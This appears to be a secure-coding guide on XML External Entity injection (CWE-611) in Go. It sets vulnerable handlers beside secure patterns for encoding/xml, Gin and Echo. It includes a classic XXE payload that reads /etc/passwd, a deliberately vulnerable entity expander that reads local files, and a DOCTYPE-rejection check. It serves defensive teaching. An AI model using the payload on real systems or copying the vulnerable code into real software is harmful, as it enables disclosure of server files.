Skip to content

CWE-611: XML External Entity (XXE) Injection - Go

Overview

XXE vulnerabilities in Go applications occur when XML parsers process external entity references in untrusted XML input. Go's standard encoding/xml package does not provide DTD validation or arbitrary external entity resolution; it recognizes the predefined XML entities and any extra replacements supplied through Decoder.Entity. The main XXE risk in Go comes from third-party XML libraries, native parser bindings, custom entity expansion, or forwarding accepted DTD-bearing XML into another component that resolves entities.

The xml.Decoder processes XML without fetching external entities, preventing the classic file-disclosure and SSRF forms of XXE when the standard library parser is used directly. Developers still need body-size limits, strict structure validation, and a review of any custom entity map or third-party parser configuration.

The Go ecosystem strongly favors JSON over XML for APIs and configuration, reducing XXE exposure. When XML processing is necessary (SOAP services, legacy integrations, XML configurations), understanding the security characteristics of encoding/xml and avoiding third-party parsers with unsafe defaults is critical. The simplicity of Go's standard library XML parser - with minimal configuration options - is a security advantage, as there are fewer knobs to misconfigure compared to feature-rich parsers in other languages.

Primary Defence: Use Go's standard encoding/xml package for untrusted XML, reject DOCTYPE/ENTITY declarations at the boundary when they are not required, and avoid third-party XML libraries unless they can explicitly disable external entity processing, external DTD loading, and DTD validation.

Common Vulnerable Patterns

Unsafe Assumption About DTDs in encoding/xml

// VULNERABLE - Accepts DTD-bearing XML and forwards it downstream
package main

import (
    "encoding/xml"
    "fmt"
    "io"
    "net/http"
    "strings"
)

type Result struct {
    Data string `xml:"data"`
}

func parseXMLHandler(w http.ResponseWriter, r *http.Request) {
    body, _ := io.ReadAll(r.Body)

    var result Result
    err := xml.Unmarshal(body, &result)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }

    // DANGEROUS: Storing or forwarding the original XML can expose
    // downstream processors that do resolve external entities.
    forwardToLegacyXmlProcessor(body)
    fmt.Fprintf(w, "Data: %s", result.Data)
}

// Attack XML:
// <?xml version="1.0"?>
// <!DOCTYPE foo [
//   <!ENTITY xxe SYSTEM "file:///etc/passwd">
// ]>
// <result><data>&xxe;</data></result>
//

Why this is vulnerable: encoding/xml does not fetch the external entity, but this handler accepts XML containing DTD/entity declarations and forwards the original document to another XML processor. Boundary rejection avoids parser-specific behavior differences and prevents dangerous XML from reaching components with less restrictive defaults.

Third-Party XML Libraries

// VULNERABLE - Using CGo-based libxml2 binding
import (
    "net/http"

    "github.com/lestrrat-go/libxml2"
    "github.com/lestrrat-go/libxml2/parser"
)

func parseWithLibxml2(w http.ResponseWriter, r *http.Request) {
    body, _ := io.ReadAll(r.Body)

    // DANGEROUS: libxml2 may have unsafe defaults
    doc, err := libxml2.Parse(body)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }
    defer doc.Free()

    // Process document...
}

// Attack: Same XXE payload can trigger file disclosure
// if libxml2 has entity resolution enabled

Why this is vulnerable: Third-party libraries, especially those wrapping native XML parsers through CGo (libxml2, expat), may have different security features and defaults than Go's standard library. They can become vulnerable when external entity processing or DTD loading is enabled or not explicitly restricted. CGo dependencies also complicate deployment and security reviews.

Custom Entity Expansion or Preprocessing

// VULNERABLE - Application-level entity expansion
import (
    "os"
    "regexp"
)

var externalEntity = regexp.MustCompile(`<!ENTITY\s+(\w+)\s+SYSTEM\s+"file://([^"]+)"`)

func expandEntities(xmlData []byte) []byte {
    // DANGEROUS: Reimplements external entity expansion in application code.
    return externalEntity.ReplaceAllFunc(xmlData, func(match []byte) []byte {
        parts := externalEntity.FindSubmatch(match)
        if len(parts) != 3 {
            return match
        }
        data, _ := os.ReadFile(string(parts[2]))
        return data
    })
}

func parseUserXml(xmlData []byte) {
    expanded := expandEntities(xmlData)
    // expanded now contains attacker-selected local file contents
    _ = expanded
}

Why this is vulnerable: encoding/xml does not provide external entity resolution, but custom preprocessing can recreate the same vulnerability. Never implement SYSTEM/PUBLIC entity expansion for untrusted XML. If entity-like substitution is required for a trusted internal format, use a fixed allowlist of names and values that cannot read files or make network requests.

Unsafe Decoder Entity Map

// VULNERABLE - Entity map populated from attacker-controlled names
import (
    "encoding/xml"
    "io"
    "strings"
)

func parseWithCustomEntities(xmlData string, entities map[string]string) error {
    decoder := xml.NewDecoder(strings.NewReader(xmlData))
    decoder.Entity = entities // DANGEROUS if values are attacker-controlled

    for {
        _, err := decoder.Token()
        if err == io.EOF {
            return nil
        }
        if err != nil {
            return err
        }
    }
}

Why this is vulnerable: Decoder.Entity maps non-standard entity names to replacement strings. It does not fetch external resources by itself, but filling it from user input can create injection, memory amplification, or data-confusion bugs. Keep custom entity maps static and small, or reject custom entities entirely.

DTD Validation Enabled

// POTENTIALLY VULNERABLE - If DTD validation is somehow enabled
// (Note: encoding/xml doesn't provide built-in DTD validation,
// but this illustrates the concept)

func parseWithValidation(w http.ResponseWriter, r *http.Request) {
    body, _ := io.ReadAll(r.Body)

    // If using a library that validates DTDs,
    // external entity references in the DTD could be processed
    decoder := xml.NewDecoder(strings.NewReader(string(body)))

    // Process XML...
    var result interface{}
    err := decoder.Decode(&result)
    if err != nil {
        http.Error(w, err.Error(), 400)
        return
    }
}

// Attack: DTD with external entity declarations

Why this is vulnerable: DTD validation can trigger external entity processing because DTDs can define entities that reference external resources. While Go's encoding/xml doesn't validate DTDs, third-party libraries that do can be vulnerable if they don't disable external entity resolution during validation.

Secure Patterns

Use encoding/xml for Untrusted XML

// SECURE - Standard library does not fetch external entities
package main

import (
    "encoding/xml"
    "io"
    "log"
    "net/http"
)

type User struct {
    XMLName xml.Name `xml:"user"`
    Name    string   `xml:"name"`
    Email   string   `xml:"email"`
    Role    string   `xml:"role"`
}

func parseXMLHandler(w http.ResponseWriter, r *http.Request) {
    // Limit request body size to prevent DoS
    r.Body = http.MaxBytesReader(w, r.Body, 1048576) // 1MB limit

    body, err := io.ReadAll(r.Body)
    if err != nil {
        http.Error(w, "Request too large", http.StatusRequestEntityTooLarge)
        return
    }
    defer r.Body.Close()

    var user User
    // SECURE: encoding/xml does not fetch external entities
    err = xml.Unmarshal(body, &user)
    if err != nil {
        log.Printf("XML parse error: %v", err)
        http.Error(w, "Invalid XML", http.StatusBadRequest)
        return
    }

    // Validate parsed data
    if user.Name == "" || user.Email == "" {
        http.Error(w, "Missing required fields", http.StatusBadRequest)
        return
    }

    // Process user data safely
    w.Header().Set("Content-Type", "application/json")
    fmt.Fprintf(w, `{"status":"success","name":"%s"}`, user.Name)
}

Why this works: Go's encoding/xml parser does not resolve external SYSTEM/PUBLIC entities into file or network content. When DTD/entity declarations are not part of the expected input contract, reject them before parsing and use http.MaxBytesReader to limit upload size. Input validation after parsing ensures that even if unexpected XML passes parsing, the business logic will not process invalid data.

XML Decoder with Streaming (Large Documents)

// SECURE - Streaming XML parsing for large documents
import (
    "encoding/xml"
    "io"
    "net/http"
)

type Item struct {
    ID    string `xml:"id,attr"`
    Name  string `xml:"name"`
    Value string `xml:"value"`
}

func streamXMLHandler(w http.ResponseWriter, r *http.Request) {
    // Create decoder from request body
    decoder := xml.NewDecoder(r.Body)
    defer r.Body.Close()

    // SECURE: Decoder also doesn't resolve external entities
    var items []Item

    for {
        token, err := decoder.Token()
        if err == io.EOF {
            break
        }
        if err != nil {
            http.Error(w, "Parse error", 400)
            return
        }

        // Process start elements
        if se, ok := token.(xml.StartElement); ok {
            if se.Name.Local == "item" {
                var item Item
                if err := decoder.DecodeElement(&item, &se); err != nil {
                    http.Error(w, "Decode error", 400)
                    return
                }
                items = append(items, item)
            }
        }
    }

    // Process items...
    w.WriteHeader(http.StatusOK)
}

Why this works: xml.NewDecoder() creates a streaming decoder that processes XML incrementally, reducing memory usage for large documents. The decoder inherits the same XXE protection as xml.Unmarshal() - external entities are not resolved. Streaming also provides better control over parsing, allowing rejection of documents with unexpected structure before full parsing. This pattern is ideal for SOAP services or XML feeds where documents may be large.

Input Sanitization (Defense in Depth)

// SECURE - Reject XML with DOCTYPE declarations
import (
    "bytes"
    "encoding/xml"
    "io"
    "net/http"
)

func secureXMLHandler(w http.ResponseWriter, r *http.Request) {
    body, err := io.ReadAll(io.LimitReader(r.Body, 1048576))
    if err != nil {
        http.Error(w, "Read error", 500)
        return
    }
    defer r.Body.Close()

    // SECURE: Reject XML with DOCTYPE (defense in depth)
    if containsDOCTYPE(body) {
        http.Error(w, "DOCTYPE declarations not allowed", 400)
        return
    }

    var data interface{}
    err = xml.Unmarshal(body, &data)
    if err != nil {
        http.Error(w, "Invalid XML", 400)
        return
    }

    w.WriteHeader(http.StatusOK)
}

func containsDOCTYPE(xmlData []byte) bool {
    upper := bytes.ToUpper(xmlData)
    return bytes.Contains(upper, []byte("<!DOCTYPE")) ||
        bytes.Contains(upper, []byte("<!ENTITY"))
}

Why this works: While encoding/xml doesn't fetch external entities, explicitly rejecting <!DOCTYPE> and <!ENTITY> declarations provides defense-in-depth and prevents dangerous XML from being stored, logged, forwarded, or later parsed by a different component. This check is an early boundary control; secure parser selection remains the primary control.

Prefer JSON Over XML

// SECURE - Use JSON instead of XML (best practice)
import (
    "encoding/json"
    "io"
    "net/http"
)

type UserRequest struct {
    Name  string `json:"name"`
    Email string `json:"email"`
    Role  string `json:"role"`
}

func jsonHandler(w http.ResponseWriter, r *http.Request) {
    var user UserRequest

    // SECURE: JSON has no XML entity mechanism
    decoder := json.NewDecoder(io.LimitReader(r.Body, 1048576))
    decoder.DisallowUnknownFields() // Strict parsing

    err := decoder.Decode(&user)
    if err != nil {
        http.Error(w, "Invalid JSON", 400)
        return
    }
    defer r.Body.Close()

    // Validate
    if user.Name == "" || user.Email == "" {
        http.Error(w, "Missing fields", 400)
        return
    }

    // Process...
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string]string{
        "status": "success",
        "name":   user.Name,
    })
}

Why this works: JSON parsers have no concept of external entities, DTDs, or entity references. Using JSON instead of XML removes XXE from that input path. JSON is also simpler to parse, has broad client support, and generates smaller payloads. This is the recommended approach for new systems unless XML is required for compatibility with SOAP, SAML, or legacy systems.

Framework-Specific Guidance

Gin with XML Binding

// SECURE - Gin XML binding uses encoding/xml
package main

import (
    "net/http"

    "github.com/gin-gonic/gin"
)

type Config struct {
    AppName string `xml:"appname"`
    Version string `xml:"version"`
    Debug   bool   `xml:"debug"`
}

func main() {
    r := gin.Default()

    // Limit request size globally
    r.MaxMultipartMemory = 1 << 20 // 1MB

    r.POST("/config", configHandler)

    r.Run(":8080")
}

func configHandler(c *gin.Context) {
    var config Config

    // SECURE: Gin uses encoding/xml internally
    if err := c.ShouldBindXML(&config); err != nil {
        c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid XML"})
        return
    }

    // Validate
    if config.AppName == "" {
        c.JSON(http.StatusBadRequest, gin.H{"error": "appname required"})
        return
    }

    c.JSON(http.StatusOK, gin.H{
        "status": "configured",
        "app":    config.AppName,
    })
}

Why this works: Gin's XML binding uses Go's standard encoding/xml package, so it does not fetch external entities. Keep request size limits, reject DTD/entity declarations if they are not expected, and validate the parsed struct before using it. Review separately if the application swaps in a custom XML binder or forwards raw XML to another service.

Echo XML Deserialization

// SECURE - Echo with XML binding
package main

import (
    "net/http"

    "github.com/labstack/echo/v4"
    "github.com/labstack/echo/v4/middleware"
)

type Message struct {
    To      string `xml:"to"`
    From    string `xml:"from"`
    Content string `xml:"content"`
}

func main() {
    e := echo.New()

    // Middleware
    e.Use(middleware.Logger())
    e.Use(middleware.Recover())
    e.Use(middleware.BodyLimit("1M")) // Limit body size

    e.POST("/message", messageHandler)

    e.Start(":8080")
}

func messageHandler(c echo.Context) error {
    var msg Message

    // SECURE: Echo uses encoding/xml
    if err := c.Bind(&msg); err != nil {
        return c.JSON(http.StatusBadRequest, map[string]string{
            "error": "Invalid XML",
        })
    }

    // Validate
    if msg.To == "" || msg.From == "" {
        return c.JSON(http.StatusBadRequest, map[string]string{
            "error": "Missing required fields",
        })
    }

    return c.JSON(http.StatusOK, map[string]interface{}{
        "status":  "received",
        "to":      msg.To,
        "from":    msg.From,
        "preview": msg.Content[:min(len(msg.Content), 50)],
    })
}

func min(a, b int) int {
    if a < b {
        return a
    }
    return b
}

Why this works: Echo's default XML binding uses encoding/xml, so it does not fetch external entities. The middleware.BodyLimit middleware enforces request size limits globally across all routes. Continue to reject DTD/entity declarations where they are not part of the API contract and validate all parsed fields.

Additional Resources